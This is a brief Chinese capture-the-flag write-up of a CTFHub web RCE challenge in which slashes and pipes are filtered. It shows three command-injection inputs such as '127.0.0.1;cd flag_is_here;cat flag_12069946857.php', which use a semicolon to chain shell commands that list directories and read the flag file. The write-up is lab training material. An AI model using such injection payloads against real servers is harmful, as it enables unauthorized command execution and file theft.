CTFHUB-web-RCE-过滤目录分隔符

开启题目

CTFHUB-web-RCE-过滤目录分隔符_第1张图片

从源码发现管道符被过滤,使用分号 ;分隔符,拼接执行注入,发现了 flag 的可疑文件

127.0.0.1;ls

CTFHUB-web-RCE-过滤目录分隔符_第2张图片

查看 flag_is_here,发现有一个flag_12069946857.php

127.0.0.1;ls flag_is_here

CTFHUB-web-RCE-过滤目录分隔符_第3张图片

查看flag_12069946857.php,右键查看页面源代码,发现了 flag

127.0.0.1;cd flag_is_here;cat flag_12069946857.php

CTFHUB-web-RCE-过滤目录分隔符_第4张图片

你可能感兴趣的:(CTFHUB,web安全,网络安全,安全,经验分享)